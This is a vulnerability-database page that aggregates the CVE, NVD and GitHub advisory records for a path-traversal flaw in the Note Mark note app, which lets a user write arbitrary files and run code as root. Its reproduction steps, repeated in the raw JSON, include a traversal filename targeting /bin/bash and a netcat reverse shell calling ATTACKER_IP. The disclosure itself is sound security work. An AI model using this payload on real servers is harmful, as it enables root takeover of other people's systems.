Vulnerability-Lookup

CVE-2026-44522 (GCVE-0-2026-44522)

Vulnerability from cvelistv5 – Published: 2026-05-14 18:44 – Updated: 2026-05-14 19:44

Title

Note Mark: Arbitrary File Write via Path Traversal in Asset Names Leading to Remote Code Execution

Summary

Note Mark is an open-source note-taking application. From 0.13.0 to before 0.19.4, the Note Mark application allows authenticated users to upload assets to notes via POST /api/notes/{noteID}/assets, where the asset filename is provided through the X-Name HTTP request header. This value is stored directly in the database without any sanitization or validation - no path separator filtering, no directory traversal sequence rejection, and no use of filepath.Base() to strip directory components. The unsanitized name is persisted as-is in the note_assets table (Name column, varchar(80)). When an administrator subsequently runs the data export CLI commands (note-mark migrate export-v1 or note-mark migrate export), the stored asset name is passed directly into filepath.Join() and path.Join() calls as part of the output file path argument to os.Create(). Since Go's filepath.Join() resolves ../ sequences during path normalization, an attacker-controlled asset name containing directory traversal sequences causes the export process to write files to arbitrary locations on the filesystem, completely outside the intended export directory. This vulnerability is fixed in 0.19.4.

Severity

8.6 (High)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE

CWE-20 - Improper Input Validation
CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Assigner

GitHub_M

References

1 reference

URL	Tags
https://github.com/enchant97/note-mark/security/a…	x_refsource_CONFIRM

Impacted products

1 product

Vendor	Product	Version
enchant97	note-mark	Affected: >= 0.13.0, < 0.19.4

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-44522",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-14T19:44:26.723448Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-14T19:44:31.854Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/enchant97/note-mark/security/advisories/GHSA-g49p-4qxj-88v3"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "note-mark",
          "vendor": "enchant97",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 0.13.0, \u003c 0.19.4"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Note Mark is an open-source note-taking application. From 0.13.0 to before 0.19.4, the Note Mark application allows authenticated users to upload assets to notes via POST /api/notes/{noteID}/assets, where the asset filename is provided through the X-Name HTTP request header. This value is stored directly in the database without any sanitization or validation - no path separator filtering, no directory traversal sequence rejection, and no use of filepath.Base() to strip directory components. The unsanitized name is persisted as-is in the note_assets table (Name column, varchar(80)). When an administrator subsequently runs the data export CLI commands (note-mark migrate export-v1 or note-mark migrate export), the stored asset name is passed directly into filepath.Join() and path.Join() calls as part of the output file path argument to os.Create(). Since Go\u0027s filepath.Join() resolves ../ sequences during path normalization, an attacker-controlled asset name containing directory traversal sequences causes the export process to write files to arbitrary locations on the filesystem, completely outside the intended export directory. This vulnerability is fixed in 0.19.4."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 8.6,
            "baseSeverity": "HIGH",
            "privilegesRequired": "LOW",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "PASSIVE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "HIGH",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "HIGH"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-20",
              "description": "CWE-20: Improper Input Validation",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-22",
              "description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-14T18:44:35.887Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/enchant97/note-mark/security/advisories/GHSA-g49p-4qxj-88v3",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/enchant97/note-mark/security/advisories/GHSA-g49p-4qxj-88v3"
        }
      ],
      "source": {
        "advisory": "GHSA-g49p-4qxj-88v3",
        "discovery": "UNKNOWN"
      },
      "title": "Note Mark: Arbitrary File Write via Path Traversal in Asset Names Leading to Remote Code Execution"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-44522",
    "datePublished": "2026-05-14T18:44:35.887Z",
    "dateReserved": "2026-05-06T19:38:10.566Z",
    "dateUpdated": "2026-05-14T19:44:31.854Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-44522",
      "date": "2026-05-30",
      "epss": "0.00632",
      "percentile": "0.70666"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-44522\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-14T19:16:37.330\",\"lastModified\":\"2026-05-15T14:44:49.877\",\"vulnStatus\":\"Deferred\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Note Mark is an open-source note-taking application. From 0.13.0 to before 0.19.4, the Note Mark application allows authenticated users to upload assets to notes via POST /api/notes/{noteID}/assets, where the asset filename is provided through the X-Name HTTP request header. This value is stored directly in the database without any sanitization or validation - no path separator filtering, no directory traversal sequence rejection, and no use of filepath.Base() to strip directory components. The unsanitized name is persisted as-is in the note_assets table (Name column, varchar(80)). When an administrator subsequently runs the data export CLI commands (note-mark migrate export-v1 or note-mark migrate export), the stored asset name is passed directly into filepath.Join() and path.Join() calls as part of the output file path argument to os.Create(). Since Go\u0027s filepath.Join() resolves ../ sequences during path normalization, an attacker-controlled asset name containing directory traversal sequences causes the export process to write files to arbitrary locations on the filesystem, completely outside the intended export directory. This vulnerability is fixed in 0.19.4.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":8.6,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"PASSIVE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"HIGH\",\"vulnAvailabilityImpact\":\"HIGH\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-20\"},{\"lang\":\"en\",\"value\":\"CWE-22\"}]}],\"references\":[{\"url\":\"https://github.com/enchant97/note-mark/security/advisories/GHSA-g49p-4qxj-88v3\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/enchant97/note-mark/security/advisories/GHSA-g49p-4qxj-88v3\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-44522\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-14T19:44:26.723448Z\"}}}], \"references\": [{\"url\": \"https://github.com/enchant97/note-mark/security/advisories/GHSA-g49p-4qxj-88v3\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-14T19:43:48.632Z\"}}], \"cna\": {\"title\": \"Note Mark: Arbitrary File Write via Path Traversal in Asset Names Leading to Remote Code Execution\", \"source\": {\"advisory\": \"GHSA-g49p-4qxj-88v3\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 8.6, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N\", \"userInteraction\": \"PASSIVE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"LOW\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"HIGH\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"HIGH\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"enchant97\", \"product\": \"note-mark\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 0.13.0, \u003c 0.19.4\"}]}], \"references\": [{\"url\": \"https://github.com/enchant97/note-mark/security/advisories/GHSA-g49p-4qxj-88v3\", \"name\": \"https://github.com/enchant97/note-mark/security/advisories/GHSA-g49p-4qxj-88v3\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Note Mark is an open-source note-taking application. From 0.13.0 to before 0.19.4, the Note Mark application allows authenticated users to upload assets to notes via POST /api/notes/{noteID}/assets, where the asset filename is provided through the X-Name HTTP request header. This value is stored directly in the database without any sanitization or validation - no path separator filtering, no directory traversal sequence rejection, and no use of filepath.Base() to strip directory components. The unsanitized name is persisted as-is in the note_assets table (Name column, varchar(80)). When an administrator subsequently runs the data export CLI commands (note-mark migrate export-v1 or note-mark migrate export), the stored asset name is passed directly into filepath.Join() and path.Join() calls as part of the output file path argument to os.Create(). Since Go\u0027s filepath.Join() resolves ../ sequences during path normalization, an attacker-controlled asset name containing directory traversal sequences causes the export process to write files to arbitrary locations on the filesystem, completely outside the intended export directory. This vulnerability is fixed in 0.19.4.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-20\", \"description\": \"CWE-20: Improper Input Validation\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-22\", \"description\": \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-14T18:44:35.887Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-44522\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-14T19:44:31.854Z\", \"dateReserved\": \"2026-05-06T19:38:10.566Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-14T18:44:35.887Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-44522

Vulnerability from fkie_nvd - Published: 2026-05-14 19:16 - Updated: 2026-05-15 14:44

Severity

8.6 (High) - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/enchant97/note-mark/security/advisories/GHSA-g49p-4qxj-88v3
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/enchant97/note-mark/security/advisories/GHSA-g49p-4qxj-88v3

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Note Mark is an open-source note-taking application. From 0.13.0 to before 0.19.4, the Note Mark application allows authenticated users to upload assets to notes via POST /api/notes/{noteID}/assets, where the asset filename is provided through the X-Name HTTP request header. This value is stored directly in the database without any sanitization or validation - no path separator filtering, no directory traversal sequence rejection, and no use of filepath.Base() to strip directory components. The unsanitized name is persisted as-is in the note_assets table (Name column, varchar(80)). When an administrator subsequently runs the data export CLI commands (note-mark migrate export-v1 or note-mark migrate export), the stored asset name is passed directly into filepath.Join() and path.Join() calls as part of the output file path argument to os.Create(). Since Go\u0027s filepath.Join() resolves ../ sequences during path normalization, an attacker-controlled asset name containing directory traversal sequences causes the export process to write files to arbitrary locations on the filesystem, completely outside the intended export directory. This vulnerability is fixed in 0.19.4."
    }
  ],
  "id": "CVE-2026-44522",
  "lastModified": "2026-05-15T14:44:49.877",
  "metrics": {
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 8.6,
          "baseSeverity": "HIGH",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "LOW",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "NONE",
          "subIntegrityImpact": "NONE",
          "userInteraction": "PASSIVE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "HIGH",
          "vulnConfidentialityImpact": "HIGH",
          "vulnIntegrityImpact": "HIGH",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-05-14T19:16:37.330",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/enchant97/note-mark/security/advisories/GHSA-g49p-4qxj-88v3"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "url": "https://github.com/enchant97/note-mark/security/advisories/GHSA-g49p-4qxj-88v3"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-20"
        },
        {
          "lang": "en",
          "value": "CWE-22"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-G49P-4QXJ-88V3

Vulnerability from github – Published: 2026-05-07 21:06 – Updated: 2026-05-15 23:45

Summary

Note Mark: Arbitrary File Write via Path Traversal in Asset Names Leads to Remote Code Execution

Details

Description

The Note Mark application allows authenticated users to upload assets to notes via POST /api/notes/{noteID}/assets, where the asset filename is provided through the X-Name HTTP request header. This value is stored directly in the database without any sanitization or validation - no path separator filtering, no directory traversal sequence rejection, and no use of filepath.Base() to strip directory components. The unsanitized name is persisted as-is in the note_assets table (Name column, varchar(80)).

When an administrator subsequently runs the data export CLI commands (note-mark migrate export-v1 or note-mark migrate export), the stored asset name is passed directly into filepath.Join() and path.Join() calls as part of the output file path argument to os.Create(). Since Go's filepath.Join() resolves ../ sequences during path normalization, an attacker-controlled asset name containing directory traversal sequences causes the export process to write files to arbitrary locations on the filesystem, completely outside the intended export directory.

The export process typically runs as root (the default in Docker deployments and common in bare-metal setups). This means the arbitrary file write operates with root privileges, allowing an attacker to write to any writable location on the filesystem. This can be escalated to Remote Code Execution by overwriting system binaries such as /bin/bash with a malicious payload. Since the Go binary is statically compiled and does not shell out to external programs during the export, overwriting /bin/bash does not affect the running export process. However, the next time any user or administrator invokes bash on the system, the attacker-controlled binary executes instead, resulting in code execution as root. In environments with cron or systemd, writing to /etc/cron.d/ or systemd unit files provides additional exploitation paths.

The data flow is: X-Name HTTP header > handlers/assets.go (no validation) > services/assets.go (stored to DB as-is) > cli/migrate.go (used in os.Create(filepath.Join(..., asset.Name))) > arbitrary file write.

Source Code Analysis

The asset upload handler at backend/handlers/assets.go:48-51 extracts the filename directly from the X-Name header:

type PostNoteAssetInput struct {
    NoteID  uuid.UUID `path:"noteID" format:"uuid"`
    Name    string    `header:"X-Name" required:"true"`
    RawBody []byte    `required:"true"`
}

The service layer at backend/services/assets.go:39-42 stores this value without validation:

noteAsset := db.NoteAsset{
    NoteID: noteID,
    Name:   name,
}

The V1 export function at backend/cli/migrate.go:328 uses the unsanitized name directly:

f, err := os.Create(filepath.Join(noteDir, asset.Name))

The non-V1 export function at backend/cli/migrate.go:223 similarly uses it:

f, err := os.Create(path.Join(assetsDir, asset.ID.String()+"."+asset.Name))

In both cases, filepath.Join / path.Join resolves ../ sequences in asset.Name, causing the resulting path to escape the intended directory.

Steps to Reproduce

Start a Note Mark instance (version 0.19.2 or earlier) using the official Docker image: docker run -d --name notemark -p 8080:8080 -e JWT_SECRET="$(openssl rand -base64 32)" -e PUBLIC_URL="http://localhost:8080" ghcr.io/enchant97/note-mark-aio:0.19.2
Register a user account: curl -s -X POST http://localhost:8080/api/users -H 'Content-Type: application/json' -d '{"username":"attacker","password":"Attack3r!","name":"attacker"}'
Authenticate and capture the session cookie: curl -s -D - -X POST http://localhost:8080/api/auth/token -H 'Content-Type: application/json' -d '{"username":"attacker","password":"Attack3r!","grant_type":"password"}'. Save the Auth-Session-Token cookie value from the Set-Cookie response header.
Create a notebook: curl -s -X POST http://localhost:8080/api/books -H 'Content-Type: application/json' -b 'Auth-Session-Token=<TOKEN>' -d '{"name":"test","slug":"test"}'. Note the returned id as BOOK_ID.
Create a note in the notebook: curl -s -X POST http://localhost:8080/api/books/<BOOK_ID>/notes -H 'Content-Type: application/json' -b 'Auth-Session-Token=<TOKEN>' -d '{"name":"test","slug":"test"}'. Note the returned id as NOTE_ID.
Upload an asset with a reverse shell payload in the body and a path traversal filename in the X-Name header targeting /bin/bash: curl -s -X POST http://localhost:8080/api/notes/<NOTE_ID>/assets -b 'Auth-Session-Token=<TOKEN>' -H 'X-Name: ../../../../../../bin/bash' -H 'Content-Type: application/octet-stream' -d '#!/bin/sh\nnc <ATTACKER_IP> <PORT> -e /bin/sh'. Confirm the response contains "name":"../../../../../../bin/bash", showing the traversal payload was stored without sanitization.
Trigger the export as an administrator (simulating the admin running a routine data export): docker exec notemark /note-mark migrate export-v1 --export-dir /data/backup
Verify /bin/bash was overwritten with the attacker payload: docker exec notemark cat /bin/bash. The file should contain the reverse shell script instead of the original bash binary, confirming arbitrary file write.
Start a listener on the attacker machine (nc -lvnp <PORT>), then invoke bash on the target: docker exec notemark bash. A reverse shell connects back to the attacker as root, confirming Remote Code Execution.

Proof of Concept (Video)

note-mark-path-traversal-rce.webm

Recommendations

The root cause is the complete absence of input validation on the X-Name header value used as the asset filename. The fix should be applied at two layers.

At the input layer in the asset upload handler, the application should reject any asset name containing path separators (/, \) or directory traversal sequences (..). The simplest approach is to apply filepath.Base() to the incoming name, which strips all directory components and returns only the final filename element. Names that resolve to empty strings or . after this operation should be rejected. This validation should be applied in the PostNoteAsset handler before the name reaches the service layer.

At the export layer in the CLI migration code, the application should apply filepath.Base() to asset.Name before using it in any file path construction as a defense-in-depth measure. This ensures that even if a malicious name exists in the database (from before the input validation was added), the export process cannot be exploited. Both the V1 export path at migrate.go:328 and the standard export path at migrate.go:223 require this fix.

Reported By: Ravindu Wickramasinghe (rvz) - Zyenra Security - www.zyenra.com

Severity

8.6 (High)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/enchant97/note-mark/backend"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.0-20260501152243-db3f72bff780"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44522"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-07T21:06:55Z",
    "nvd_published_at": "2026-05-14T19:16:37Z",
    "severity": "HIGH"
  },
  "details": "### Description\n\nThe Note Mark application allows authenticated users to upload assets to notes via `POST /api/notes/{noteID}/assets`, where the asset filename is provided through the `X-Name` HTTP request header. This value is stored directly in the database without any sanitization or validation - no path separator filtering, no directory traversal sequence rejection, and no use of `filepath.Base()` to strip directory components. The unsanitized name is persisted as-is in the `note_assets` table (`Name` column, `varchar(80)`).\n\nWhen an administrator subsequently runs the data export CLI commands (`note-mark migrate export-v1` or `note-mark migrate export`), the stored asset name is passed directly into `filepath.Join()` and `path.Join()` calls as part of the output file path argument to `os.Create()`. Since Go\u0027s `filepath.Join()` resolves `../` sequences during path normalization, an attacker-controlled asset name containing directory traversal sequences causes the export process to write files to arbitrary locations on the filesystem, completely outside the intended export directory.\n\nThe export process typically runs as root (the default in Docker deployments and common in bare-metal setups). This means the arbitrary file write operates with root privileges, allowing an attacker to write to any writable location on the filesystem. This can be escalated to Remote Code Execution by overwriting system binaries such as `/bin/bash` with a malicious payload. Since the Go binary is statically compiled and does not shell out to external programs during the export, overwriting `/bin/bash` does not affect the running export process. However, the next time any user or administrator invokes `bash` on the system, the attacker-controlled binary executes instead, resulting in code execution as root. In environments with cron or systemd, writing to `/etc/cron.d/` or systemd unit files provides additional exploitation paths.\n\nThe data flow is: `X-Name` HTTP header \u003e `handlers/assets.go` (no validation) \u003e `services/assets.go` (stored to DB as-is) \u003e `cli/migrate.go` (used in `os.Create(filepath.Join(..., asset.Name))`) \u003e arbitrary file write.\n\n#### Source Code Analysis\n\nThe asset upload handler at `backend/handlers/assets.go:48-51` extracts the filename directly from the `X-Name` header:\n\n```go\ntype PostNoteAssetInput struct {\n    NoteID  uuid.UUID `path:\"noteID\" format:\"uuid\"`\n    Name    string    `header:\"X-Name\" required:\"true\"`\n    RawBody []byte    `required:\"true\"`\n}\n```\n\nThe service layer at `backend/services/assets.go:39-42` stores this value without validation:\n\n```go\nnoteAsset := db.NoteAsset{\n    NoteID: noteID,\n    Name:   name,\n}\n```\n\nThe V1 export function at `backend/cli/migrate.go:328` uses the unsanitized name directly:\n\n```go\nf, err := os.Create(filepath.Join(noteDir, asset.Name))\n```\n\nThe non-V1 export function at `backend/cli/migrate.go:223` similarly uses it:\n\n```go\nf, err := os.Create(path.Join(assetsDir, asset.ID.String()+\".\"+asset.Name))\n```\n\nIn both cases, `filepath.Join` / `path.Join` resolves `../` sequences in `asset.Name`, causing the resulting path to escape the intended directory.\n\n\n### Steps to Reproduce\n\n1. Start a Note Mark instance (version 0.19.2 or earlier) using the official Docker image: `docker run -d --name notemark -p 8080:8080 -e JWT_SECRET=\"$(openssl rand -base64 32)\" -e PUBLIC_URL=\"http://localhost:8080\" ghcr.io/enchant97/note-mark-aio:0.19.2`\n\n2. Register a user account: `curl -s -X POST http://localhost:8080/api/users -H \u0027Content-Type: application/json\u0027 -d \u0027{\"username\":\"attacker\",\"password\":\"Attack3r!\",\"name\":\"attacker\"}\u0027`\n\n3. Authenticate and capture the session cookie: `curl -s -D - -X POST http://localhost:8080/api/auth/token -H \u0027Content-Type: application/json\u0027 -d \u0027{\"username\":\"attacker\",\"password\":\"Attack3r!\",\"grant_type\":\"password\"}\u0027`. Save the `Auth-Session-Token` cookie value from the `Set-Cookie` response header.\n\n4. Create a notebook: `curl -s -X POST http://localhost:8080/api/books -H \u0027Content-Type: application/json\u0027 -b \u0027Auth-Session-Token=\u003cTOKEN\u003e\u0027 -d \u0027{\"name\":\"test\",\"slug\":\"test\"}\u0027`. Note the returned `id` as `BOOK_ID`.\n\n5. Create a note in the notebook: `curl -s -X POST http://localhost:8080/api/books/\u003cBOOK_ID\u003e/notes -H \u0027Content-Type: application/json\u0027 -b \u0027Auth-Session-Token=\u003cTOKEN\u003e\u0027 -d \u0027{\"name\":\"test\",\"slug\":\"test\"}\u0027`. Note the returned `id` as `NOTE_ID`.\n\n6. Upload an asset with a reverse shell payload in the body and a path traversal filename in the `X-Name` header targeting `/bin/bash`: `curl -s -X POST http://localhost:8080/api/notes/\u003cNOTE_ID\u003e/assets -b \u0027Auth-Session-Token=\u003cTOKEN\u003e\u0027 -H \u0027X-Name: ../../../../../../bin/bash\u0027 -H \u0027Content-Type: application/octet-stream\u0027 -d \u0027#!/bin/sh\\nnc \u003cATTACKER_IP\u003e \u003cPORT\u003e -e /bin/sh\u0027`. Confirm the response contains `\"name\":\"../../../../../../bin/bash\"`, showing the traversal payload was stored without sanitization.\n\n7. Trigger the export as an administrator (simulating the admin running a routine data export): `docker exec notemark /note-mark migrate export-v1 --export-dir /data/backup`\n\n8. Verify `/bin/bash` was overwritten with the attacker payload: `docker exec notemark cat /bin/bash`. The file should contain the reverse shell script instead of the original bash binary, confirming arbitrary file write.\n\n9. Start a listener on the attacker machine (`nc -lvnp \u003cPORT\u003e`), then invoke bash on the target: `docker exec notemark bash`. A reverse shell connects back to the attacker as root, confirming Remote Code Execution.\n\n#### Proof of Concept (Video) \n[note-mark-path-traversal-rce.webm](https://github.com/user-attachments/assets/6969a00a-3ad1-4e30-b5ce-9e780da4fa2b)\n\n\n### Recommendations\n\nThe root cause is the complete absence of input validation on the `X-Name` header value used as the asset filename. The fix should be applied at two layers.\n\nAt the input layer in the asset upload handler, the application should reject any asset name containing path separators (`/`, `\\`) or directory traversal sequences (`..`). The simplest approach is to apply `filepath.Base()` to the incoming name, which strips all directory components and returns only the final filename element. Names that resolve to empty strings or `.` after this operation should be rejected. This validation should be applied in the `PostNoteAsset` handler before the name reaches the service layer.\n\nAt the export layer in the CLI migration code, the application should apply `filepath.Base()` to `asset.Name` before using it in any file path construction as a defense-in-depth measure. This ensures that even if a malicious name exists in the database (from before the input validation was added), the export process cannot be exploited. Both the V1 export path at `migrate.go:328` and the standard export path at `migrate.go:223` require this fix.\n\n\nReported By: Ravindu Wickramasinghe (rvz) - Zyenra Security -  www.zyenra.com",
  "id": "GHSA-g49p-4qxj-88v3",
  "modified": "2026-05-15T23:45:00Z",
  "published": "2026-05-07T21:06:55Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/enchant97/note-mark/security/advisories/GHSA-g49p-4qxj-88v3"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44522"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/enchant97/note-mark"
    },
    {
      "type": "WEB",
